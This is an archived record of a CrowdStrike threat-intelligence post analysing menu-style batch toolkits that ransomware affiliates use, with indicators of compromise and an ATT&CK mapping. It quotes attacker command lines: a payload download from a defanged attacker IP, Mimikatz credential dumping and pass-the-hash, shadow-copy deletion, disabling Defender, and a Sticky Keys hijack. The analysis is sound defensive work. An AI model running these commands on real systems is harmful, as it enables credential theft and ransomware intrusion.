{ "id": "5b571477-25dc-4892-a760-1dcff4974485", "created_at": "2026-04-06T00:19:06.34604Z", "updated_at": "2026-04-10T03:30:33.806877Z", "deleted_at": null, "sha1_hash": "c38b9e1026857432679324e780c737846f14d64c", "title": "Press #1 to Play: A Look Into eCrime Menu-style Toolkits | CrowdStrike", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 748204, "plain_text": "Press #1 to Play: A Look Into eCrime Menu-style Toolkits | CrowdStrike\r\nBy Radu Vlad\r\nArchived: 2026-04-05 14:21:01 UTC\r\nThe year 2020 has seen an accelerated uptick in eCrime activity, as well as an obvious shift in eCrime adversaries engaging\r\nin big game hunting (BGH) operations that involve interactive deployment of ransomware as a popular means to monetize\r\nintrusions, prioritizing critical enterprise infrastructure (domain controllers, file servers, backup servers, etc.) over\r\nworkstations.\r\nThe increasing availability of eCrime “syndication” models proliferating Ransomware as a Service (RaaS) programs grew in\r\npopularity as a threat vector and is one of the reasons behind the increasing volume of activity, allowing more novice threat\r\nactors to capitalize on the advanced skills of criminal malware developers and move from opportunistic breaches to targeted\r\nBGH ransomware campaigns.\r\nOur research suggests that there is collaboration between some eCrime groups operating ransomware, or at least some form\r\nof informal knowledge sharing. The commonalities include common tools, scripts and code snippets, as well as a set of\r\noverlapping tactics, techniques and procedures (TTPs).\r\nThroughout various observed intrusion attempts to stage ransomware, we have noticed the use of menu-style scripts to\r\nautomate execution to various degrees and help achieve faster actions on objectives. The complexity of these tools varies —\r\nsamples observed so far are either based on PowerShell, like Dharma's toolkit described by Sophos, or versatile custom\r\nbatch (.bat) files.\r\nWhat’s on the Menu for Today?\r\nThe following menu.bat tool was observed during what was likely a CIRCUS SPIDER affiliate intrusion, deploying\r\nNetwalker ransomware on the victim network. At this time, there is no evidence to support that this particular threat actor\r\nsupplies additional tooling to affiliates as part of the benefits of joining the program, other than the builder/builds of the\r\nransomware and access to the corresponding decryptors in exchange for a share of the profits. With this in mind, the toolkit\r\nused in the attack was likely either directly sourced or built by the affiliates themselves.\r\nFigure 1. Overview of main menu options, as seen in the menu.bat execution\r\nBased on a hard-coded path that the script calls in one of the options, we have identified a second script that likely ties in\r\nwith menu.bat. Run.bat employs the same menu-style options and was retrieved from an archive hosted on a public\r\nmalware repository that contained a number of common tools used by actors that stage ransomware, like PsExec and\r\nns64.exe , alongside one WinRAR self-extracting archive named menu.exe, which most likely contains the aforementioned\r\nmenu.bat.\u003e\r\nhttps://www.crowdstrike.com/blog/analysis-of-ecrime-menu-style-toolkits/\r\nPage 1 of 6\n\nFigure 2. Overview of script code snippet, as seen in run.bat\r\nMenu.bat is something of a Swiss Army knife that enables the operator to easily switch between a choice of options that can\r\nquickly employ defense evasion, credential access, discovery, lateral movement tools or command lines. By comparison,\r\nRun.bat solely focuses on harvesting credentials. Both scripts implement common potentially unwanted programs (PUPs),\r\nand Mimikatz as the main credential harvester option.\r\nPick a Number, Any Number!\r\nOnce initial access has been obtained (the most common entry vectors being RDP credential spraying against web-facing\r\nhosts, previously stolen credentials, or vulnerable web applications), the operator proceeds with dropping the tools to the\r\ndesired staging location. Menu.bat implements PowerShell’s WebClient.DownloadFile method to grab WinRAR self-extracting password-protected archives hosted on the attacker’s infrastructure.\r\npowershell -Command \"(New-Object Net.WebClient).DownloadFile('http\u003c:\u003e//93.115.21\u003c.\u003e56\u003c:\u003e5983/sdjfjsdklfskld/pass/Collecto\r\nFigure 3. The attacker protects downloaded tooling through WinRAR self-extracting password-protected archives\r\nIt is likely that the actor has favored this method in order to minimize operational security risks and potentially thwart\r\nincident response efforts, in case any of the downloaded archives would have been left behind — this way, a defender will\r\nnot be able to easily identify what the artifacts are, without additional logging or telemetry capability. Other password\r\ncollection options include the use of “ collector.exe ,” “ web.exe ” and “ credentials.exe .” While we were not able to\r\naccurately identify the tools stored in these archives, we presume that these might be part of the third-party Windows\r\nPassword Recovery Tools suite by Nirsoft due to the file names and the fact that these tools are heavily used by various\r\ngroups. These are legitimate tools used by administrators, but they are also commonly employed by various actors and\r\naffiliates, like Dharma operators. “ Web.exe ,” for example, likely stores WebBrowserPassView — a password recovery tool\r\nthat reveals the passwords stored in popular web browsers — and “ credentials.exe ” could hold\r\nCredentialsFileView.exe , which has the ability to decrypt and display passwords and other data stored inside Windows\r\ncredential files.\r\nhttps://www.crowdstrike.com/blog/analysis-of-ecrime-menu-style-toolkits/\r\nPage 2 of 6\n\nFigure 4. Code snippet overview of various backdoor menu options menu.bat is able to deploy\r\nThe actor has implemented the option to deploy various remote access tools (RATs) to secure backdoor access — in this\r\nexample, the actor is likely dropping variations of the Quasar RAT (referenced as “Qwazar”) and Cobalt Strike on the target\r\nsystem. The three menu options for deploying Quasar seem to reflect the default Quasar client builder options, to set the\r\ninstallation directory to either the User’s %APPDATA% folder (erroneously called UAC in the script, most likely a typo),\r\nProgram Files, or the Windows System32 or SysWOW64 (both options requiring administrator privileges). The installation\r\nname in all cases will be “ iexplorer.exe .”\r\nFigure 5. The attacker is using Advanced Port Scanner to map the victim’s network for available hosts\r\nhttps://www.crowdstrike.com/blog/analysis-of-ecrime-menu-style-toolkits/\r\nPage 3 of 6\n\nThe scanner portion of the menu enables the operator to pull down both NS.exe and aps.exe from a server under their\r\ncontrol in order to map the compromised network for available hosts. Network Scanner (seen here as NS.exe ) is a utility\r\nused to discover, describe and mount network shares. The tool was originally tracked as being employed by Dharma\r\noperators but is increasingly popular among various other ransomware operator groups. Advanced Port Scanner (named\r\naps.exe by the operator) is yet another popular and publicly available tool used in intrusions leading to ransomware.\r\nFigure 6. Overview of brute-force menu (brut) options, as seen in menu.bat . The attacker is using NLBrute to access other\r\nhosts on the victim’s network through RDP.\r\nThe toolkit also incorporates brute-forcing capabilities that leverage the well-known NLB ( NLBrute.exe ) tool — another\r\nransomware operator favorite — and rdpforcer RDP scanner, which enables the actor to perform lateral movement within\r\nthe network. The \"CMD commands” portion of the menu contains a set of command line interface (CLI) instructions,\r\ngrouped into nine options.\r\nSub-menu\r\nOption\r\nNumber\r\nSub-menu\r\nOption Name\r\nDescription\r\n1\r\nSession for 2\r\nUsers\r\nEnables the operator to lift the limitation that Microsoft enforces on concurrent remote or local user connections, by app\r\nUniversal Terminal Server patch (essentially overriding Termsrv.dll ) so that a remote user can log in to their account\r\ntheir account when physically at the computer.\r\n2 Open RDP\r\nDownloads and starts the OpenRDP.exe , another password-protected self-extracting archive. We were unable to accurat\r\nwe suspect it may hold another batch script to secure RDP access to the target system.\r\n3\r\nDelete Shadow\r\nCopies\r\nIssues a vssadmin delete shadows /all command, one of the most commonly used methods employed by ransomwar\r\ncopies.\r\n4\r\nNewLocalUser-admin\r\nKicks off yet another set of post-exploitation commands, which involve the creation and addition of the “Adminitsrato\r\nAdministrator group, for persistence purposes, as well as enabling RDP and Remote Assistance on the remote machine,\r\nuser’s folder on disk and in the registry. This part of the script overlaps with both open source Post Exploitation code fre\r\ncollaboration platforms, as well as posts on various forums linked to pentesting.\r\n5\r\nPovishenie\r\nprav\r\nProvides the operator with a local privilege escalation method by downloading the HTML Help Installation and Update\r\nused to exploit a privilege escalation vulnerability (CVE-2019-1388) in the Windows Certificate Dialog, allowing an att\r\nAUTHORITY\\SYSTEM.\r\n6 Off Defender Thwarts Windows Defender protection capability by issuing a powershell -Command \"Set-MpPreference -DisableReal\r\n7 Zalipalka\r\nReplaces the sethc.exe binary with Task Manager in a well-known variation of the Sticky Keys attack method. Choos\r\nattacker more flexibility, like the ability to perform a Lsass dump from taskmgr, kill processes and start any application\r\nREG ADD \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\sethc.exe\" /v Debugger /t R\r\n8 Off 2 minutes\r\nModifies RDP Connection Time control settings so the operator will not be disconnected from the Remote Desktop conn\r\nreg add \"HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows NT\\Terminal Services\" /v \"MaxConnectionTime\" /t REG_DWORD /d 0x0 /\r\n9\r\nForse\r\nRESTART\r\nForces an immediate restart of the system. shutdown -r -t 0\r\nhttps://www.crowdstrike.com/blog/analysis-of-ecrime-menu-style-toolkits/\r\nPage 4 of 6\n\n10 Menu Returns the operator to the main menu section of the script.\r\n0 Exit Closes script execution.\r\nTable 1. Details of the “CMD commands” sub-section, as seen in menu.bat . Finally, the menu.bat script allows the\r\noperator to issue a self-delete command of every item in the staging folder.\r\nRun.bat consists of six menu sections, most of which target credential access. It requires kiwi.exe to already be present on\r\ndisk, which can be previously downloaded via menu.bat or simply dropped to disk in the %TEMP%\\CCI\\CCW\\mimi folder.\r\nMenu\r\nOption\r\nNumber\r\nMenu\r\nOption\r\nName\r\nDescription\r\n1 Pass\r\nThis option uses Mimikatz to list all available provider credentials, and stores the output results in a .txt file.\r\nkiwi.exe \"privilege::debug\" \"log Result.txt\" \"sekurlsa::logonPasswords\" \"token::elevate\" \"lsadump::sam\" vault::cred exit\r\n2\r\nAD\r\nNTLM\r\nUses Mimikatz's dcsync option, which utilizes the Directory Replication Service (DRS) to retrieve the password hashes. The dom\r\nfor /f %%a in ('wmic ComputerSystem get Domain') do for /f %%b in (\"%%a\") do set y=%%b kiwi.exe \"log NTLMAD.txt\" \"privileg\r\n3\r\nLoger\r\nMIMI\r\nUses Mimikatz to inject a malicious Security Support Provider (SSP) into memory in order to capture passwords for all users tha\r\n4\r\nVizov\r\ncmd\r\nntlm\r\nAdmina\r\nEnables the operator to perform a Pass-the-Hash with Mimikatz using previously acquired password hashes.\r\nkiwi.exe \"sekurlsa::pth /user:%c% /domain:\u003cvictim domain\u003e /ntlm:%d% /run:cmd\" exit\r\n5 Parser\r\nMakes use of Parser.exe , a freeware utility for processing both fixed-length and field-delimited ASCII flat-file representations\r\nfrom the IP address and Computername of the target. Various other eCrime actors have favored similar implementations of this t\r\npasswords/NTLM login details.\r\ncd %TEMP%\\CCI\\CCW\\mimi Parser.exe FOR /F \"usebackq tokens=2 delims=\u003c\u003e\" %%i IN (`ping %Computername% -n 1 -4`) DO if not\r\nVariations of the above code are also used by Options 1 and 2 in order to organize results.\r\n6\r\nClean\r\nAnd\r\nExit\r\nKicks off a self-delete command of every item in the staging folder.\r\ncls cd %temp% rd /s /q %temp%\\CCI\r\n0 Exit Closes script execution.\r\nTable 2. Details of the available selection items, as seen in run.bat .\r\nAttribution\r\nSome of the command line sub-menu options and file names referenced throughout the two scripts appear to be using\r\ntransliterated Russian, a method of representing letters or words from the Cyrillic alphabet into Latin characters. “CMD\r\ncommands” sub-menu Option 5 (“Povishenie prav”) and the name of the downloaded hhupd.exe binary (“ Prava\r\nadmina.exe ”) roughly translate as “increasing rights” and “admin rights,” respectively. Command line sub-menu Option 7\r\ncould be slang for “залипат” (“to stick”). Menu Option 4 from the run.bat script (“Vizov cmd ntlm Admina”) is also a\r\nstrong indicator toward establishing attribution, with “vizov” meaning “calling” (“вызов”). This suggests that either the\r\noperator or the developer of these scripts may be based in a Slavic-speaking country, likely located in the eastern or\r\nsoutheastern Europe regions. The following table summarizes the toolkit’s capabilities and maps them to the relevant\r\nMITRE ATT\u0026CK® tactics.\r\nInitial\r\nAccess\r\nExecution Persistence\r\nPrivilege\r\nEscalation\r\nDefense\r\nEvasion\r\nCredential\r\nAccess\r\nDiscovery\r\nLateral\r\nMovement\r\nCollection Exfiltration I\r\nRDP\r\ncredential\r\nspraying\r\nWindows\r\nCommand\r\nShell\r\nAccessibility\r\nFeatures\r\nCVE-2019-1388\r\nDisable\r\nWindows\r\nDefender\r\nMimikatz NS.exe NLBrute N/A N/A\r\nD\r\nS\r\nC\r\nhttps://www.crowdstrike.com/blog/analysis-of-ecrime-menu-style-toolkits/\r\nPage 5 of 6\n\nStolen\r\nRDP\r\ncredentials\r\nPowerShell\r\nNew Local\r\nAdministrator\r\nAccount\r\n \r\nModify\r\nRegistry\r\nSettings\r\nRelated\r\nto RDP\r\nThird-party\r\nWindows\r\nPassword\r\nRecovery\r\nTools\r\nAdvanced\r\nPort\r\nScanner\r\nRDP\r\nForcer\r\n     \r\n \r\nQuasar\r\nRAT\r\n                 \r\n \r\nCobalt\r\nStrike\r\n                 \r\nTable 3. Toolkit killchain\r\nConclusion\r\nThis case study shows how legitimate third-party “freeware” software, well-known security tools and publicly available\r\nexploits can easily be stitched together in a menu-style script to provide operators with a high execution tempo to achieve\r\ntheir goals. Human-interactive post-exploitation that delivers ransomware poses a significant and ever-increasing threat to\r\ncompanies as adversaries evolve and incorporate more techniques and capabilities in their toolkits. With the expected\r\ngrowth in BGH operations throughout this year,we will likely see actors continue to adapt and be more resourceful, as well\r\nas deploy in the field similar new tools as the one described. Security solutions such as the CrowdStrike Falcon® endpoint\r\nprotection platform come with many preventative features to protect against threats like human-operated ransomware\r\nintrusions. These features — which include machine learning (ML), behavioral preventions and executable quarantining —\r\nare highly effective at stopping ransomware and other common techniques that criminal organizations employ.\r\nIndicators of Compromise (IOCs)\r\nFile SHA256\r\nmenu.bat d2121e6774fb8cc6dc62ca112dabe7e10b1947fdac1b81d20c069a7fa90f6bb8\r\nrun.bat 46564ec92a7c2e7335bbec9c261af9ec3869260b13e4bdaa318fd7e1867e9888\r\nAdditional Resources\r\nLearn about recent intrusion trends, adversary tactics and highlights of notable intrusions in the 2020 Threat\r\nHunting Report.\r\nUnderstand the trends and themes that we observed while responding to and remediating incidents around the globe\r\nin 2020 — download the latest CrowdStrike Services Cyber Front Lines Report.\r\nLearn more about the CrowdStrike Falcon® platform by visiting the product webpage.\r\nTest CrowdStrike next-gen AV for yourself. Start your free trial of Falcon Prevent™ today.\r\nSource: https://www.crowdstrike.com/blog/analysis-of-ecrime-menu-style-toolkits/\r\nhttps://www.crowdstrike.com/blog/analysis-of-ecrime-menu-style-toolkits/\r\nPage 6 of 6", "extraction_quality": 1, "language": "EN", "sources": [ "MISPGALAXY", "Malpedia" ], "references": [ "https://www.crowdstrike.com/blog/analysis-of-ecrime-menu-style-toolkits/" ], "report_names": [ "analysis-of-ecrime-menu-style-toolkits" ], "threat_actors": [ { "id": "53201ab8-30d2-4722-816e-f914604e78df", "created_at": "2022-10-25T16:07:23.466825Z", "updated_at": "2026-04-10T02:00:04.620188Z", "deleted_at": null, "main_name": "Circus Spider", "aliases": [], "source_name": "ETDA:Circus Spider", "tools": [ "Koko Ransomware", "MailTo", "NetWalker" ], "source_id": "ETDA", "reports": null }, { "id": "373d61cc-32a0-4c0c-b48b-ff9e3f1357ac", "created_at": "2023-01-06T13:46:39.222456Z", "updated_at": "2026-04-10T02:00:03.250483Z", "deleted_at": null, "main_name": "CIRCUS SPIDER", "aliases": [], "source_name": "MISPGALAXY:CIRCUS SPIDER", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "81dde5cc-c29f-430d-8c6e-e5e92d5015e7", "created_at": "2022-10-25T16:07:23.704358Z", "updated_at": "2026-04-10T02:00:04.718034Z", "deleted_at": null, "main_name": "Harvester", "aliases": [], "source_name": "ETDA:Harvester", "tools": [ "Agentemis", "Cobalt Strike", "CobaltStrike", "Graphon", "Metasploit", "cobeacon" ], "source_id": "ETDA", "reports": null }, { "id": "75108fc1-7f6a-450e-b024-10284f3f62bb", "created_at": "2024-11-01T02:00:52.756877Z", "updated_at": "2026-04-10T02:00:05.273746Z", "deleted_at": null, "main_name": "Play", "aliases": null, "source_name": "MITRE:Play", "tools": [ "Nltest", "AdFind", "PsExec", "Wevtutil", "Cobalt Strike", "Playcrypt", "Mimikatz" ], "source_id": "MITRE", "reports": null } ], "ts_created_at": 1775434746, "ts_updated_at": 1775791833, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/c38b9e1026857432679324e780c737846f14d64c.pdf", "text": "https://archive.orkl.eu/c38b9e1026857432679324e780c737846f14d64c.txt", "img": "https://archive.orkl.eu/c38b9e1026857432679324e780c737846f14d64c.jpg" } }